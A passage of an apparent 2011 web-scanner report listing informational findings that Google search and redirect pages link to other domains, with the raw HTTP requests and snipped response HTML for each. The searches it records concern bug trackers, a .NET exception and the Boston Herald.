<div class=osl><a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Components" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGQQ0gIoADAA')">Components</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Usage" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGUQ0gIoATAA')">Usage</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Bug_tracking_systems_as_a_part_of_integrated_project_management_systems" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGYQ0gIoAjAA')">Bug tracking systems as a part ...</a> - <a href="http://en.wikipedia.org/wiki/Bug_tracking_system#Distributed_bug_tracking" onmousedown="return rwt(this,'','','','1','AFQjCNGSt7zi7r6r78G8zEqfguEkC_KCwg','','0CGcQ0gIoAzAA')">Distributed bug tracking</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems" class=l onmousedown="return rwt(this,'','','','2','AFQjCNGDUuJXWPVj7RPO-y1Slzj6a160nQ','','0CGkQFjAB')">Comparison of issue-<em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:bvCHZldW1GYJ:en.wikipedia.org/wiki/Comparison_of_issue-tracking_systems+bug+tracking&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNGTBAXJwS_sYSPORJeHZSyOLf5w6A','','0CG4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bugzilla.org/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFmTuRcPWbMYcfeZeWGkaw0WdJcsg','','0CHEQFjAC')">Home :: Bugzilla :: bugzilla.org</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BpOeJlnhSWAJ:www.bugzilla.org/+bug+tracking&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNFBDt-ke0z8AofJ_fwJIfkZ8-JmQQ','','0CHYQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.atlassian.com/software/jira/solutions/bug-tracking.jsp" class=l onmousedown="return rwt(this,'','','','4','AFQjCNGnvlpF4sgjDNBGbSDa8VHLQrIlbw','','0CHgQFjAD')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:mkv4Rdq2onwJ:www.atlassian.com/software/jira/solutions/bug-tracking.jsp+bug+tracking&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNEtfZhnI7DKM4X3Ga0EtGLP5Zu3dg','','0CH0QIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mantisbt.org/" class=l onmousedown="return rwt(this,'','','','5','AFQjCNEoDFzAtoxyR2pWSXnI5aAosHLQMg','','0CH8QFjAE')">Mantis <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:TLmiE-hxiTUJ:www.mantisbt.org/+bug+tracking&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNEI2WCjTT22kfr04_8j5ZS69f_7Dw','','0CIQBECAwBA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.fogcreek.com/fogbugz/" class=l onmousedown="return rwt(this,'','','','6','AFQjCNGfkGJfJlpz_6sn8ljCZ5QHn1U_CA','','0CIYBEBYwBQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:gX0M89UF050J:www.fogcreek.com/fogbugz/+bug+tracking&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNEeojZNa0PfKXPxBBwYd5vfMVuG0A','','0CIsBECAwBQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.joelonsoftware.com/articles/fog0000000029.html" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGlouJopJzJsufknlbcYveR3fEnKA','','0CI0BEBYwBg')">Painless <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:7gOAt9acjMEJ:www.joelonsoftware.com/articles/fog0000000029.html+bug+tracking&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNFQquymuH6dXtVi-CRJ7-_pHyj7DA','','0CJIBECAwBg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ifdefined.com/bugtrackernet.html" class=l onmousedown="return rwt(this,'','','','8','AFQjCNF_A23sBkQ1h4GzyacZ9Nsukq56LQ','','0CJQBEBYwBw')">BugTracker.NET Home - Free <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:RWxCCvfaA5IJ:ifdefined.com/bugtrackernet.html+bug+tracking&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNHhZj4db7MJyNtozBugYPwYaP8jmw','','0CJkBECAwBw')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.debian.org/Bugs/" class=l onmousedown="return rwt(this,'','','','9','AFQjCNGTauCz-x6BiPNPiP1rdqEwRYywtA','','0CJsBEBYwCA')">Debian <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:iKyHH49TdB4J:www.debian.org/Bugs/+bug+tracking&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNEYB74NWajlRNNhZfK4OtprGFgYkQ','','0CKABECAwCA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://elementool.com/" class=l onmousedown="return rwt(this,'','','','10','AFQjCNF8WHN2D07B8gLtVABMdMAa5E3-Cg','','0CKIBEBYwCQ')">Project Management Software</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:pM6BltjZBlYJ:elementool.com/+bug+tracking&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEqJaH_UTg7dLCCLp0YgtlXibtE2g','','0CKcBECAwCQ')">Cached</a>
...[SNIP]...

20.80. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=%22ArgumentOutOfRangeException%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a

The response contains the following links to other domains:

http://docs.go-mono.com/System.ArgumentOutOfRangeException
http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v=vs.71).aspx
http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx
http://penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html
http://stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range
http://support.microsoft.com/kb/839588
http://webcache.googleusercontent.com/search?q=cache:9AmTS3jYI30J:stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range+%22ArgumentOutOfRangeException%22&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:D7gtFZ07oL4J:www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html+%22ArgumentOutOfRangeException%22&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:PjTQ8inOZwMJ:docs.go-mono.com/System.ArgumentOutOfRangeException+%22ArgumentOutOfRangeException%22&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:XFS8Q_aXddwJ:support.microsoft.com/kb/839588+%22ArgumentOutOfRangeException%22&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:YVLUv65ie_EJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx+%22ArgumentOutOfRangeException%22&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ZJHoYvJo0MsJ:www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:e6Pe1TZ19fYJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v%3Dvs.71).aspx+%22ArgumentOutOfRangeException%22&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:mnN-1tk0NhwJ:www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:tnLrFglkJ6cJ:www.dotnetperls.com/argumentoutofrangeexception+%22ArgumentOutOfRangeException%22&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:uy0HaXXj4IYJ:penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.dotnetperls.com/argumentoutofrangeexception
http://www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html
http://www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html
http://www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html
http://www.youtube.com/results?q=%22ArgumentOutOfRangeException%22&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=%22ArgumentOutOfRangeException%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 23:35:22 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 76060

<!doctype html><head><title>"ArgumentOutOfRangeException" - Google Search</title><script>window.google={kEI:"uhQmTteAOa-40AGDgM3JCg",kEXPI:"17259,28505,28936,29859,30316,30465,30727,31388,31
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=%22ArgumentOutOfRangeException%22&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHt7LpFDkTTyOWuAgCcOMZi2AccVA','','0CBYQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:YVLUv65ie_EJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception.aspx+%22ArgumentOutOfRangeException%22&cd=1&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNE6HWuXEpwvuZZn6gJ71jeZ3DuF3w','','0CBgQIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v=vs.71).aspx" class=l onmousedown="return rwt(this,'','','','2','AFQjCNEUnx3jf98DOvQHNCEHu9KPy_TO6g','','0CBoQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:e6Pe1TZ19fYJ:msdn.microsoft.com/en-us/library/system.argumentoutofrangeexception(v%3Dvs.71).aspx+%22ArgumentOutOfRangeException%22&cd=2&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNEAr2SX_l4vPB8nnPXySZi1_c517g','','0CBwQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://support.microsoft.com/kb/839588" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFGbW2lynoIIA8t7jsCK2IH6nk1IQ','','0CB0QFjAC')">FIX: You receive a System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:XFS8Q_aXddwJ:support.microsoft.com/kb/839588+%22ArgumentOutOfRangeException%22&cd=3&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNGkH8vsgE7bHrwJ5Lebcnx6uYFEWQ','','0CB8QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','4','AFQjCNGxnnLSTqfdhQqj0j6h-3Mcx0_lVw','','0CCEQFjAD')">Type: System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:uy0HaXXj4IYJ:penguin.ewu.edu/cscd306/refdocs/System/types/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=4&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNHqjUs8Xg2ACY7vdhEfHETIZNs97g','','0CCMQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range" class=l onmousedown="return rwt(this,'','','','5','AFQjCNGi-obdizWQylcBYtS058Pw8I2huA','','0CCQQFjAE')">nhibernate - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9AmTS3jYI30J:stackoverflow.com/questions/600308/argumentoutofrangeexception-index-was-out-of-range+%22ArgumentOutOfRangeException%22&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNGdALGcLUnNpvbSb1ZyqWJrlf8RtQ','','0CCsQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.dotnetperls.com/argumentoutofrangeexception" class=l onmousedown="return rwt(this,'','','','6','AFQjCNFRe3argRzfn-zvtzGSOfnk4tg2Bw','','0CC0QFjAF')">C# <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tnLrFglkJ6cJ:www.dotnetperls.com/argumentoutofrangeexception+%22ArgumentOutOfRangeException%22&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNHWL_7WW6KPAszXEU4q7OuEQBYKLA','','0CC8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','7','AFQjCNG33IyGN2XnWTY3dhxXQ1gTT3W8Mw','','0CDAQFjAG')">System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:mnN-1tk0NhwJ:www.gnu.org/projects/dotgnu/pnetlib-doc/System/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=7&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGpctGhZWeXIZsLV78WISadsB_dJA','','0CDIQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://docs.go-mono.com/System.ArgumentOutOfRangeException" class=l onmousedown="return rwt(this,'','','','8','AFQjCNEN-zcmQFa9ZmGR_nD2XW_dBMCKRg','','0CDQQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PjTQ8inOZwMJ:docs.go-mono.com/System.ArgumentOutOfRangeException+%22ArgumentOutOfRangeException%22&cd=8&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNHnlXNVCDsUC7-JXAPaCulct-65RQ','','0CDYQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html" class=l onmousedown="return rwt(this,'','','','9','AFQjCNFjF3hjA8X6dR6twb1dkH4jy452_Q','','0CDcQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ZJHoYvJo0MsJ:www.kellyethridge.com/vbcorlib/doc/ArgumentOutOfRangeException.html+%22ArgumentOutOfRangeException%22&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNHmt9o98cvdsaG4QVfk-wj386K7eQ','','0CDkQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNFw6TPokranny5fqmojfpyoI2WrAg','','0CDsQFjAJ')">System.<em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:D7gtFZ07oL4J:www.velocityreviews.com/forums/t89506-system-argumentoutofrangeexception-index-was-out-of-range.html+%22ArgumentOutOfRangeException%22&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNEaJn8Oyec2NxUEmzi3NN-_TH2NHA','','0CEIQIDAJ')">Cached</a>
...[SNIP]...

20.81. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=boston+herald&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Boston_Herald
http://webcache.googleusercontent.com/search?q=cache:AAB1XHJU8VIJ:en.wikipedia.org/wiki/Boston_Herald+boston+herald&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:AFHB6oN7HR8J:www.heraldmedia.com/bostonHerald/index.html+boston+herald&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:UJmbmH6db48J:www.legacy.com/obituaries/bostonherald/+boston+herald&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:iGZWYyai9rMJ:www.newseum.org/todaysfrontpages/hr.asp%3FfpVname%3DMA_BH%26ref_pge%3Dlst+boston+herald&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com
http://www.allaccess.com/net-news/archive/story/93976/prosecutors-to-retry-former-boston-talker-on-moles
http://www.bostonherald.com/
http://www.bostonherald.com/blogs/entertainment/love_that_tv/?p=669&srvc=blogs&position=recent
http://www.bostonherald.com/news/
http://www.bostonherald.com/news/opinion/editorials/view/20110719dont_blame_the_tests/
http://www.bostonherald.com/sports/
http://www.bostonherald.com/sports/baseball/index.bg
http://www.heraldmedia.com/bostonHerald/index.html
http://www.jobfind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.newseum.org/todaysfrontpages/hr.asp?fpVname=MA_BH&ref_pge=lst
http://www.twitter.com/bostonherald
http://www.youtube.com/results?q=boston+herald&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?q=boston+herald&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:39:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 81395

<!doctype html><head><title>boston herald - Google Search</title><script>window.google={kEI:"fuslTsTLIojZ0QHQ7cDmCg",kEXPI:"17259,28505,29859,30316,30465,30727,31388,31406,31493",kCSI:{e:"17259,28505,
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=boston+herald&oe=utf-8&rls=org.mozilla:en-US:unofficial&client=firefox-a&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHdQCasYQ-wZeu0UAGNggG90DKJNw','','0CCUQFjAA')">Home - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/sports/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNE4m6GQV4OC1lgmnELAqiunXRgGtg','','0CCgQFjAB')">Sports - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/news/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNEDkU7hpisNyjHita6-ZhvyPBgSzQ','','0CCsQFjAC')">News & Opinion - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.bostonherald.com/sports/baseball/index.bg" class=l onmousedown="return rwt(this,'','','','4','AFQjCNEvl0IurF5DS3zH5CchJOY1Szw9-Q','','0CC4QFjAD')">Red Sox & MLB - Sports - <em>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Boston_Herald" class=l onmousedown="return rwt(this,'','','','5','AFQjCNGC1QbzohlBFcC62_fdSu7o_aNvyQ','','0CDIQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AAB1XHJU8VIJ:en.wikipedia.org/wiki/Boston_Herald+boston+herald&cd=5&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','5','AFQjCNF9UXH2goMAeIvaLMwsfnm4c90vTQ','','0CDQQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.legacy.com/obituaries/bostonherald/" class=l onmousedown="return rwt(this,'','','','6','AFQjCNEFiwYzvxiOuYe28bUmS7FdhThVhw','','0CDYQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:UJmbmH6db48J:www.legacy.com/obituaries/bostonherald/+boston+herald&cd=6&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','6','AFQjCNGc0Cg8-1rGyyOQqerk89Fq1AaGBA','','0CDgQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jobfind.com/" class=l onmousedown="return rwt(this,'','','','7','AFQjCNGLl0JvVXBaORrnhq-1A2BxA59nYQ','','0CDoQFjAG')">Jobfind - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.twitter.com/bostonherald" class=l onmousedown="return rwt(this,'','','','8','AFQjCNGEfNvZvC4tld7Ixad0OT1BP5Pgxw','','0CD0QFjAH')"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.newseum.org/todaysfrontpages/hr.asp?fpVname=MA_BH&ref_pge=lst" class=l onmousedown="return rwt(this,'','','','9','AFQjCNHWucsKqqROi8qqckvwrGu4yqCNLw','','0CD8QFjAI')">Newseum | Today's Front Pages | <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iGZWYyai9rMJ:www.newseum.org/todaysfrontpages/hr.asp%3FfpVname%3DMA_BH%26ref_pge%3Dlst+boston+herald&cd=9&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNFPUmo8NkM8npPQeCV5cOunDOeZ6g','','0CEMQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.heraldmedia.com/bostonHerald/index.html" class=l onmousedown="return rwt(this,'','','','10','AFQjCNHRz3DDkyPYea_ryUW4m-uOonNP8w','','0CEUQFjAJ')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:AFHB6oN7HR8J:www.heraldmedia.com/bostonHerald/index.html+boston+herald&cd=10&hl=en&ct=clnk&gl=us&client=firefox-a&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNGHZ5CtnUjzQH32B-Km4IBmsONttQ','','0CEcQIDAJ')">Cached</a>
...[SNIP]...
<li class=w0 style="list-style-position:outside;margin-top:5px"><a href="http://www.bostonherald.com/blogs/entertainment/love_that_tv/?p=669&srvc=blogs&position=recent" class=l onmousedown="return rwt(this,'','','','11','AFQjCNEEU3Fi2f_PL9n7Q5ZQyb9FbJGeWw','','0CEkQqQIwCg')">Search Past 7 days Archives</a>
...[SNIP]...
<div style=max-width:509px><a href="http://www.bostonherald.com/news/opinion/editorials/view/20110719dont_blame_the_tests/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNFLWXRfVk-8HkVQtAIFUcWCuod-_Q','','0CEwQqQIwCw')">Don't blame the tests</a>
...[SNIP]...
<div style=max-width:509px><a href="http://www.allaccess.com/net-news/archive/story/93976/prosecutors-to-retry-former-boston-talker-on-moles" class=l onmousedown="return rwt(this,'','','','13','AFQjCNGxAU6kVMpf4lV39_rKqoIXq8iZYw','','0CE8QqQIwDA')">Prosecutors To Retry Former <em>
...[SNIP]...

20.82. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fcorporate.everydayhealth.com%2F&ei=tuYlTuabMaTb0QG_89HiCg&usg=AFQjCNHABxMIlzi-Z9-GYytDSaro2mdJUw

The response contains the following link to another domain:

http://corporate.everydayhealth.com/

Request

GET /url?sa=t&source=web&cd=1&ved=0CBoQFjAA&url=http%3A%2F%2Fcorporate.everydayhealth.com%2F&ei=tuYlTuabMaTb0QG_89HiCg&usg=AFQjCNHABxMIlzi-Z9-GYytDSaro2mdJUw HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Waterfront-media
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 302 Found
Location: http://corporate.everydayhealth.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 Jul 2011 20:20:05 GMT
Server: gws
Content-Length: 233
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://corporate.everydayhealth.com/">here</A>
...[SNIP]...

20.83. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
